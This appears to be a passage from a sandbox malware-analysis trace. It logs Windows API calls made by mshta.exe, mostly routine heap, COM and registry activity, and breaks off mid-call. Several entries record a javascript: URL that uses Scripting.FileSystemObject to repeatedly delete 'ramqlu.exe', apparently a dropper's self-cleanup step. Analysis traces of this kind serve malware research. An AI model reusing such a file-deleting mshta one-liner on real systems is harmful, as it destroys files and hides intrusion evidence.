dwFlags=0x0, lpMem=0x453090 | out: hHeap=0x410000) returned 1 [0069.838] 
RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x453090 [0069.838] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45ef48 [0069.838] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.839] IUnknown:QueryInterface (in: This=0x444bf4, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2cf010 | out: ppvObject=0x2cf010*=0x461740) returned 0x0 [0069.839] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.839] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf028 | out: ppCP=0x2cf028*=0x461768) returned 0x0 [0069.839] IConnectionPoint:Advise (in: This=0x461768, pUnkSink=0x46be68, pdwCookie=0x46be80 | out: pdwCookie=0x46be80*=0x46be68) returned 0x0 [0069.839] IUnknown:QueryInterface (in: This=0x46be68, riid=0x74afa638*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppvObject=0x2cefcc | out: ppvObject=0x2cefcc*=0x46be68) returned 0x0 [0069.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4530d0 [0069.840] IUnknown:AddRef (This=0x46be68) returned 0x3 [0069.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45ef90 [0069.840] IUnknown:Release (This=0x46be68) returned 0x2 [0069.840] IUnknown:Release (This=0x461768) returned 0x0 [0069.840] IUnknown:Release (This=0x461740) returned 0x0 [0069.840] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 
Size=0x28) returned 0x4537c8 [0069.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x48) returned 0x45db80 [0069.841] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.842] GetMessageTime () returned 0 [0069.842] GetMessagePos () returned 0x0 [0069.842] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2cf124 | out: plResult=0x2cf124) returned 0x0 [0069.844] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.844] GetMessageTime () returned 0 [0069.844] GetMessagePos () returned 0x0 [0069.844] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x2ceb54 | out: plResult=0x2ceb54) returned 0x0 [0069.845] GetCurrentThreadId () returned 0x90 [0069.845] GetCurrentThreadId () returned 0x90 [0069.845] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.845] GetMessageTime () returned 0 [0069.845] GetMessagePos () returned 0x0 [0069.845] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf2d8 | out: lpPoint=0x2cf2d8) returned 1 [0069.846] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf2d8 | out: lpPoint=0x2cf2d8) returned 1 [0069.846] GetCapture () returned 0x0 [0069.846] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c268 [0069.846] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4537f8 [0069.849] IUnknown:AddRef (This=0x46be68) returned 0x5 [0069.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x45ff48 [0069.849] HTMLWindowEvents2:onresize (This=0x46be68, pEvtObj=0x418) [0069.849] IUnknown:Release (This=0x46be68) returned 0x4 [0069.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45ff48 | out: hHeap=0x410000) returned 1 [0069.849] GetCurrentThreadId () returned 0x90 [0069.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c268 | out: hHeap=0x410000) returned 1 
[0069.849] GetCurrentThreadId () returned 0x90 [0069.849] GetCurrentThreadId () returned 0x90 [0069.849] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x2cf514 | out: plResult=0x2cf514) returned 0x1 [0069.849] NtdllDefWindowProc_W () returned 0x0 [0069.849] GetCurrentThreadId () returned 0x90 [0069.850] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x445c90, hWnd=0x202a8, phIMC=0x2cf83c | out: phIMC=0x2cf83c*=0x402af) returned 0x0 [0069.850] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x445c90, hWnd=0x202a8, hIME=0x0, phPrev=0x2cf83c | out: phPrev=0x2cf83c*=0x402af) returned 0x0 [0069.850] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.850] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, riid=0x758221c8*(Data1=0x3050f613, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf6ac | out: ppCP=0x2cf6ac*=0x461760) returned 0x0 [0069.850] IConnectionPoint:Unadvise (This=0x461760, dwCookie=0x46be68) returned 0x0 [0069.850] IUnknown:AddRef (This=0x46be68) returned 0x5 [0069.850] IUnknown:Release (This=0x46be68) returned 0x4 [0069.850] IUnknown:Release (This=0x46be68) returned 0x3 [0069.850] IUnknown:Release (This=0x461760) returned 0x0 [0069.850] IUnknown:Release (This=0x461740) returned 0x0 [0069.850] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.850] IUnknown:QueryInterface (in: This=0x444bf4, riid=0x758221d8*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2cf6a4 | out: ppvObject=0x2cf6a4*=0x461740) returned 0x0 [0069.850] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x461740 [0069.850] IConnectionPointContainer:FindConnectionPoint (in: This=0x461740, 
riid=0x758221b8*(Data1=0x3050f625, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), ppCP=0x2cf6a8 | out: ppCP=0x2cf6a8*=0x461768) returned 0x0 [0069.851] IConnectionPoint:Unadvise (This=0x461768, dwCookie=0x46be68) returned 0x0 [0069.851] IUnknown:AddRef (This=0x46be68) returned 0x4 [0069.851] IUnknown:Release (This=0x46be68) returned 0x3 [0069.851] IUnknown:Release (This=0x46be68) returned 0x2 [0069.851] IUnknown:Release (This=0x461768) returned 0x0 [0069.851] IUnknown:Release (This=0x461740) returned 0x0 [0069.851] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461740 | out: hHeap=0x410000) returned 1 [0069.851] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537f8 | out: hHeap=0x410000) returned 1 [0069.851] IUnknown:Release (This=0x444bf4) returned 0x3 [0069.851] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537c8 | out: hHeap=0x410000) returned 1 [0069.851] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.852] GetMessageTime () returned 0 [0069.852] GetMessagePos () returned 0x0 [0069.852] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2cf524 | out: plResult=0x2cf524) returned 0x0 [0069.852] GetCurrentThreadId () returned 0x90 [0069.852] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0069.852] GetMessageTime () returned 0 [0069.852] GetMessagePos () returned 0x0 [0069.852] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x2cf524 | out: plResult=0x2cf524) returned 0x0 [0069.853] GetCurrentThreadId () returned 0x90 [0069.853] IsOS (dwOS=0x25) returned 1 [0069.853] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf730 | out: phkResult=0x2cf730*=0x1e8) returned 0x0 
[0069.853] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf734 | out: phkResult=0x2cf734*=0x1ec) returned 0x0 [0069.853] RegOpenKeyExW (in: hKey=0x1ec, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf6f0 | out: phkResult=0x2cf6f0*=0x0) returned 0x2 [0069.853] RegOpenKeyExW (in: hKey=0x1e8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf6f0 | out: phkResult=0x2cf6f0*=0x1f0) returned 0x0 [0069.853] SHRegGetValueW () returned 0x0 [0069.854] RegCloseKey (hKey=0x1f0) returned 0x0 [0069.854] RegCloseKey (hKey=0x0) returned 0x6 [0069.854] RegCloseKey (hKey=0x0) returned 0x6 [0069.854] RegCloseKey (hKey=0x1e8) returned 0x0 [0069.854] RegCloseKey (hKey=0x1ec) returned 0x0 [0069.854] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x73710000 [0071.890] GetVersionExW (in: lpVersionInformation=0x2cf23c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf23c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0071.890] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x73710000 [0071.890] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf7b8, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.892] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf818, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.892] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4537c8 [0071.893] LoadStringW (in: hInstance=0x73710000, uID=0xb5, lpBuffer=0x2cf804, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0071.893] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x42d8e8, 
Size=0x48) returned 0x45dbd0 [0071.893] ShowWindow (hWnd=0x202a8, nCmdShow=1) returned 1 [0071.893] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f818 | out: hHeap=0x410000) returned 1 [0071.893] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0071.893] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0071.893] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0071.894] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43f818 [0071.894] RegisterDragDrop (hwnd=0x202a8, pDropTarget=0x750296cc) returned 0x0 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetCurrentThreadId () returned 0x90 [0071.894] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0071.894] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0071.894] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0071.895] IInternetProtocolRoot:Continue (This=0x45435c, pProtocolData=0x42d9c8) returned 0x0 [0071.895] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x46c678 [0071.895] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf870 | out: ppu=0x2cf870) returned 0x0 [0071.895] IUnknown:QueryInterface (in: This=0x453428, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2cf764 | out: ppvObject=0x2cf764*=0x0) returned 0x80004002 [0071.895] IServiceProvider:QueryService (in: This=0x45342c, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, 
Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x2cf764 | out: ppvObject=0x2cf764*=0x444aa4) returned 0x0 [0071.895] GetCurrentThreadId () returned 0x90 [0071.895] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf818 | out: phkResult=0x2cf818*=0x21c) returned 0x0 [0071.896] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf81c | out: phkResult=0x2cf81c*=0x220) returned 0x0 [0071.896] RegOpenKeyExW (in: hKey=0x220, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf7d8 | out: phkResult=0x2cf7d8*=0x0) returned 0x2 [0071.896] RegOpenKeyExW (in: hKey=0x21c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf7d8 | out: phkResult=0x2cf7d8*=0x0) returned 0x2 [0071.896] RegCloseKey (hKey=0x0) returned 0x6 [0071.896] RegCloseKey (hKey=0x0) returned 0x6 [0071.896] RegCloseKey (hKey=0x21c) returned 0x0 [0071.896] RegCloseKey (hKey=0x220) returned 0x0 [0071.896] StrToIntW (lpSrc="4479904") returned 4479904 [0071.897] CoTaskMemFree (pv=0x42d8e8) [0071.897] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0071.897] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf80c, dwFlags=0x0 | out: pdwZone=0x2cf80c*=0xffffffff) returned 0x800c0011 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0071.897] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0071.897] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x1400, pPolicy=0x2cf810, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2cf810*=0x0) returned 0x0 [0071.897] IUnknown:Release (This=0x43bfcc) returned 0x3 [0071.897] CoCreateInstance (in: rclsid=0x2cf7c4*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x2cf780 | out: ppv=0x2cf780*=0x2a50488) returned 0x0 [0072.901] malloc (_Size=0x80) returned 0x58d990 [0072.901] GetVersion () returned 0x1db10106 [0072.901] __dllonexit () returned 0x74a57ecf [0072.901] __dllonexit () returned 0x74a57e9b [0072.901] __dllonexit () returned 0x74a57eb5 [0072.902] __dllonexit () returned 0x74a57f70 [0072.961] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0072.962] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.962] EtwRegisterTraceGuidsA () returned 0x0 [0072.962] GetProcAddress (hModule=0x77710000, lpProcName="RegisterTraceGuidsA") returned 0x77ca848f [0072.962] EtwRegisterTraceGuidsA () returned 0x0 [0072.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2ce134, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0072.963] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0072.963] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x2ce258 | out: phkResult=0x2ce258*=0x0) returned 0x2 [0072.973] GetVersion () returned 0x1db10106 [0072.973] 
DllGetClassObject (in: rclsid=0x441310*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cea44 | out: ppv=0x2cea44*=0x58fe00) returned 0x0 [0072.973] ??2@YAPAXI@Z () returned 0x58fe00 [0072.974] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x58fe00, pUnkOuter=0x0, riid=0x2cf3f0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x2cea30 | out: ppvObject=0x2cea30*=0x2a50488) returned 0x0 [0072.974] ??2@YAPAXI@Z () returned 0x2a50488 [0072.974] GetUserDefaultLCID () returned 0x409 [0072.974] GetACP () returned 0x4e4 [0072.974] JScriptEngine5:IUnknown:AddRef (This=0x2a50488) returned 0x2 [0072.974] JScriptEngine5:IUnknown:Release (This=0x2a50488) returned 0x1 [0072.974] JScriptEngine5:IUnknown:Release (This=0x58fe00) returned 0x0 [0072.974] ??3@YAXPAX@Z () returned 0x1 [0072.974] JScriptEngine5:IUnknown:QueryInterface (in: This=0x2a50488, riid=0x74c495b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x2cf724 | out: ppvObject=0x2cf724*=0x2a50488) returned 0x0 [0072.974] JScriptEngine5:IUnknown:Release (This=0x2a50488) returned 0x1 [0072.975] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0072.975] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pdwZone=0x2cf694, dwFlags=0x0 | out: pdwZone=0x2cf694*=0xffffffff) returned 0x800c0011 [0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 
[0072.975] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0072.975] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwAction=0x1401, pPolicy=0x2cf698, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x2cf698*=0x0) returned 0x0 [0072.975] IUnknown:Release (This=0x43bfcc) returned 0x3 [0072.975] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x54) returned 0x470de8 [0072.986] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4707c0 [0072.986] GetCurrentThreadId () returned 0x90 [0072.986] ??2@YAPAXI@Z () returned 0x58fe00 [0072.986] GetCurrentThreadId () returned 0x90 [0072.986] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf5c0 | out: phkResult=0x2cf5c0*=0x224) returned 0x0 [0072.986] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0072.986] RegQueryValueExA (in: hKey=0x224, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x2cf5b4, lpData=0x2cf5b8, lpcbData=0x2cf5bc*=0x4 | out: lpType=0x2cf5b4*=0x4, lpData=0x2cf5b8*=0x1, lpcbData=0x2cf5bc*=0x4) returned 0x0 [0072.986] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0072.986] RegCloseKey (hKey=0x224) returned 0x0 [0072.987] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0072.987] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0072.987] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0072.987] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0072.987] CoCreateInstance (in: rclsid=0x74a423a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 
[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a423b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf5bc | out: ppv=0x2cf5bc*=0x76766460) returned 0x0 [0072.987] ??2@YAPAXI@Z () returned 0x58fe38 [0072.987] ??_U@YAPAXI@Z () returned 0x5813c0 [0072.987] ??2@YAPAXI@Z () returned 0x58fec8 [0072.987] ??2@YAPAXI@Z () returned 0x2a506a0 [0072.988] ??2@YAPAXI@Z () returned 0x58ff00 [0072.988] GetCurrentThreadId () returned 0x90 [0072.988] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x2cf560, nSize=0x27 | out: lpBuffer="") returned 0x0 [0072.988] GetCurrentThreadId () returned 0x90 [0072.988] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0072.989] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2cf5d0, cchData=6 | out: lpLCData="1252") returned 5 [0072.989] IsValidCodePage (CodePage=0x4e4) returned 1 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] CoCreateInstance (in: rclsid=0x74a415ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74a415fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2a50674 | out: ppv=0x2a50674*=0x45f140) returned 0x0 [0072.989] IUnknown:AddRef (This=0x45f140) returned 0x2 [0072.989] GetCurrentProcessId () returned 0x358 [0072.989] GetCurrentThreadId () returned 0x90 [0072.989] GetTickCount () returned 0x1148ce5 [0072.989] ISystemDebugEventFire:BeginSession (This=0x45f140, guidSourceID=0x74a416d4, strSessionName="JScript:00000856:00000144:18124005") returned 0x0 [0072.990] GetCurrentThreadId () returned 0x90 [0072.990] GetCurrentThreadId () returned 0x90 [0072.990] ??2@YAPAXI@Z () returned 0x58ff68 [0073.008] GetCurrentThreadId () 
returned 0x90 [0073.008] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0073.008] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x46fb68 [0073.009] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf52c | out: ppv=0x2cf52c*=0x436988) returned 0x0 [0073.011] ??2@YAPAXI@Z () returned 0x58ffa0 [0073.011] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76766460, pUnk=0x58ffa0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x58ffbc | out: pdwCookie=0x58ffbc*=0x100) returned 0x0 [0073.520] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x58ffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf4b0 | out: ppvObject=0x2cf4b0*=0x0) returned 0x80004002 [0073.520] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x58ffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf4a0 | out: ppvObject=0x2cf4a0*=0x0) returned 0x80004002 [0073.520] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x58ffa0) returned 0x2 [0073.520] IUnknown:AddRef (This=0x436988) returned 0x2 [0073.520] IUnknown:Release (This=0x436988) returned 0x1 [0073.520] ??2@YAPAXI@Z () returned 0x2a50998 [0073.521] GetTickCount () returned 0x1148d13 [0073.521] ??2@YAPAXI@Z () returned 0x2a50fe8 [0073.521] malloc (_Size=0x40) returned 0x2a51058 [0073.521] malloc (_Size=0x104) returned 0x2a510a0 [0073.521] ??2@YAPAXI@Z () returned 0x58ffc8 [0073.521] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf548 | out: 
